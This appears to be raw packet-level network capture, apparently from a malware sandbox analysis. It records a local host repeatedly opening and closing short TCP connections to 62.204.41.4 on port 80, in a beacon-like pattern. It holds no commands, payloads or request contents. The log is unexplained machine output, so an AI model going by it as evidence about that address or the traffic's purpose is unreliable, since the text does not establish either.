                                                                    Feb 8, 2023 21:32:01.593617916 CET4986280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:01.654962063 CET804986262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:01.659683943 CET804986262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:01.659877062 CET4986280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:01.763289928 CET4986280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:01.764292955 CET4986380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:01.824882984 CET804986262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:01.825072050 CET4986280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:01.825706959 CET804986362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:01.825901985 CET4986380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:01.828272104 CET4986380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:01.889719963 CET804986362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:01.892541885 CET804986362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:01.892673016 CET4986380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:01.997565985 CET4986380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:01.998878956 CET4986480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:02.059195995 CET804986362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:02.059406996 CET4986380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:02.059602976 CET804986462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:02.059748888 CET4986480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:02.060205936 CET4986480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:02.121258974 CET804986462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:02.125123978 CET804986462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:02.125252962 CET4986480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:02.232312918 CET4986480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:02.233288050 CET4986580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:02.298511028 CET804986462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:02.298544884 CET804986562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:02.298659086 CET4986480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:02.298764944 CET4986580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:02.300344944 CET4986580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:02.371242046 CET804986562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:02.371283054 CET804986562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:02.371501923 CET4986580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:02.492688894 CET4986580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:02.500221014 CET4986680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:02.553539991 CET804986562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:02.553637028 CET4986580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:02.559905052 CET804986662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:02.560038090 CET4986680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:02.560496092 CET4986680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:02.619992971 CET804986662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:02.622514963 CET804986662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:02.622739077 CET4986680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:02.731487989 CET4986680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:02.732211113 CET4986780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:02.791171074 CET804986662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:02.791337967 CET4986680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:02.793545008 CET804986762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:02.793654919 CET4986780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:02.794106007 CET4986780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:02.855611086 CET804986762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:02.858184099 CET804986762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:02.858422041 CET4986780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:02.966305971 CET4986780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:02.967025995 CET4986880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:03.027856112 CET804986862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:03.027883053 CET804986762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:03.027986050 CET4986880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:03.028012991 CET4986780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:03.033762932 CET4986880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:03.094484091 CET804986862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:03.097748041 CET804986862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:03.097934008 CET4986880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:03.232737064 CET4986880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:03.234822035 CET4986980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:03.293546915 CET804986862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:03.293621063 CET4986880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:03.296190023 CET804986962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:03.296283960 CET4986980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:03.296837091 CET4986980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:03.358360052 CET804986962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:03.360726118 CET804986962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:03.360934973 CET4986980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:03.481683016 CET4986980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:03.482556105 CET4987080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:03.542915106 CET804987062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:03.543169022 CET804986962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:03.543437004 CET4986980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:03.544884920 CET4987080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:03.546237946 CET4987080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:03.606460094 CET804987062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:03.608895063 CET804987062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:03.611607075 CET4987080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:03.716236115 CET4987080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:03.716872931 CET4987180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:03.776767969 CET804987062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:03.777384996 CET4987080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:03.778230906 CET804987162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:03.779419899 CET4987180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:03.779794931 CET4987180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:03.841012001 CET804987162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:03.844167948 CET804987162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:03.847414970 CET4987180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:03.950987101 CET4987180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:03.951997995 CET4987280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:04.012473106 CET804987162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:04.012626886 CET4987180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:04.014440060 CET804987262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:04.014606953 CET4987280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:04.015501976 CET4987280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:04.078394890 CET804987262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:04.082180023 CET804987262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:04.084584951 CET4987280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:04.204663992 CET4987280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:04.205718994 CET4987380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:04.267321110 CET804987362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:04.267359018 CET804987262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:04.267689943 CET4987380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:04.268049002 CET4987380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:04.268109083 CET4987280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:04.329507113 CET804987362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:04.331665039 CET804987362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:04.331854105 CET4987380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:04.434881926 CET4987380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:04.437268019 CET4987480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:04.497334957 CET804987362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:04.497616053 CET4987380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:04.497677088 CET804987462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:04.499547958 CET4987480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:04.500032902 CET4987480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:04.560785055 CET804987462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:04.563184023 CET804987462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:04.563360929 CET4987480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:04.681942940 CET4987480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:04.683841944 CET4987580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:04.742643118 CET804987462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:04.742856979 CET4987480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:04.745413065 CET804987562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:04.745577097 CET4987580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:04.746049881 CET4987580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:04.807665110 CET804987562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:04.810132980 CET804987562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:04.810272932 CET4987580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:04.919169903 CET4987580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:04.920193911 CET4987680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:04.981158972 CET804987562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:04.981292963 CET804987662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:04.981349945 CET4987580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:04.981436014 CET4987680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:04.982214928 CET4987680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:05.043595076 CET804987662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:05.048247099 CET804987662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:05.048398018 CET4987680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:05.161564112 CET4987680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:05.162504911 CET4987780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:05.222244024 CET804987762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:05.222496033 CET4987780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:05.223018885 CET4987780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:05.223073959 CET804987662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:05.223177910 CET4987680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:05.282778025 CET804987762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:05.286161900 CET804987762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:05.286292076 CET4987780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:05.387973070 CET4987780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:05.388871908 CET4987880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:05.447782040 CET804987762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:05.447954893 CET4987780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:05.451455116 CET804987862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:05.451621056 CET4987880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:05.452116966 CET4987880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:05.514552116 CET804987862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:05.518059969 CET804987862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:05.518177032 CET4987880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:05.627190113 CET4987880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:05.628194094 CET4987980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:05.689882040 CET804987962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:05.689915895 CET804987862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:05.689996958 CET4987980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:05.690043926 CET4987880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:05.692639112 CET4987980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:05.754458904 CET804987962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:05.757045984 CET804987962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:05.757159948 CET4987980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:05.877621889 CET4987980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:13.917743921 CET4990780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:13.980367899 CET804990762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:13.983855963 CET804990762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:13.984018087 CET4990780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:14.142929077 CET4990780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:14.144512892 CET4990880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:14.212929010 CET804990762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:14.212965012 CET804990862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:14.213145018 CET4990780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:14.213208914 CET4990880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:14.246090889 CET4990880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:14.307957888 CET804990862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:14.312478065 CET804990862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:14.312663078 CET4990880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:14.862684965 CET4990880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:14.869395971 CET4990980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:14.926809072 CET804990862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:14.927062035 CET4990880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:14.933051109 CET804990962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:14.933232069 CET4990980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:14.933906078 CET4990980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:14.995594025 CET804990962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:14.998792887 CET804990962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:14.999093056 CET4990980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:15.801501989 CET4990980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:15.802519083 CET4991080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:15.865387917 CET804990962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:15.865530014 CET4990980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:15.867075920 CET804991062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:15.867261887 CET4991080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:15.871067047 CET4991080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:15.933552027 CET804991062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:15.938445091 CET804991062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:15.938563108 CET4991080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:16.049480915 CET4991080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:16.058446884 CET4991180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:16.112131119 CET804991062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:16.112271070 CET4991080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:16.120563984 CET804991162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:16.120812893 CET4991180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:16.121218920 CET4991180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:16.183031082 CET804991162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:16.187607050 CET804991162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:16.187733889 CET4991180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:16.295727968 CET4991180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:16.297168970 CET4991280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:16.357882977 CET804991262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:16.357913017 CET804991162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:16.358170986 CET4991180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:16.358197927 CET4991280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:16.359167099 CET4991280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:16.419862032 CET804991262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:16.422133923 CET804991262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:16.422271967 CET4991280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:16.530587912 CET4991280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:16.532113075 CET4991380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:16.591453075 CET804991262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:16.591717005 CET4991280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:16.593897104 CET804991362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:16.594415903 CET4991380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:16.595551968 CET4991380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:16.658857107 CET804991362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:16.661514044 CET804991362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:16.661726952 CET4991380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:16.764458895 CET4991380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:16.765474081 CET4991480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:16.826111078 CET804991362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:16.826312065 CET4991380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:16.827963114 CET804991462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:16.828150988 CET4991480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:16.837699890 CET4991480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:16.902132988 CET804991462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:16.904551029 CET804991462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:16.904705048 CET4991480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:17.014075041 CET4991480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:17.015110016 CET4991580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:17.076023102 CET804991562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:17.076253891 CET4991580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:17.076591015 CET4991580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:17.076711893 CET804991462.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:17.076812983 CET4991480192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:17.137291908 CET804991562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:17.142472982 CET804991562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:17.142643929 CET4991580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:17.264192104 CET4991580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:17.265139103 CET4991680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:17.325018883 CET804991662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:17.325052023 CET804991562.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:17.325356960 CET4991580192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:17.325656891 CET4991680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:17.326422930 CET4991680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:17.386163950 CET804991662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:17.389087915 CET804991662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:17.389228106 CET4991680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:17.498980045 CET4991680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:17.499907017 CET4991780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:17.558808088 CET804991662.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:17.558975935 CET4991680192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:17.560427904 CET804991762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:17.560590982 CET4991780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:17.561486006 CET4991780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:17.622376919 CET804991762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:17.625283957 CET804991762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:17.625462055 CET4991780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:17.732887983 CET4991780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:17.735474110 CET4991880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:17.796212912 CET804991762.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:17.796363115 CET4991780192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:17.797399044 CET804991862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:17.797530890 CET4991880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:17.798707962 CET4991880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:17.861602068 CET804991862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:17.864259005 CET804991862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:17.864419937 CET4991880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:17.971241951 CET4991880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:17.971972942 CET4991980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:18.030901909 CET804991862.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:18.031090975 CET4991880192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:18.034610987 CET804991962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:18.034723997 CET4991980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:18.035542965 CET4991980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:18.098086119 CET804991962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:18.102407932 CET804991962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:18.102608919 CET4991980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:18.217937946 CET4991980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:18.220112085 CET4992080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:18.280319929 CET804992062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:18.280519009 CET804991962.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:18.280545950 CET4992080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:18.280611038 CET4991980192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:18.281071901 CET4992080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:18.341187954 CET804992062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:18.344707966 CET804992062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:18.344897985 CET4992080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:18.453104973 CET4992080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:18.454099894 CET4992180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:18.513667107 CET804992062.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:18.513788939 CET4992080192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:18.514574051 CET804992162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:18.514718056 CET4992180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:18.515785933 CET4992180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:18.576190948 CET804992162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:18.579456091 CET804992162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:18.579610109 CET4992180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:18.703669071 CET4992180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:18.704452038 CET4992280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:18.765561104 CET804992162.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:18.765690088 CET4992180192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:18.766566038 CET804992262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:18.766767979 CET4992280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:18.772895098 CET4992280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:18.833642960 CET804992262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:18.836345911 CET804992262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:18.836462021 CET4992280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:18.955157042 CET4992280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:18.956100941 CET4992380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:19.015825987 CET804992262.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:19.016048908 CET4992280192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:19.017585993 CET804992362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:19.017771006 CET4992380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:19.023555994 CET4992380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:19.087759018 CET804992362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:19.092922926 CET804992362.204.41.4192.168.2.3
                                                                    Feb 8, 2023 21:32:19.093060017 CET4992380192.168.2.362.204.41.4
                                                                    Feb 8, 2023 21:32:19.206684113 CET4992380192.168.2.362.204.41.4
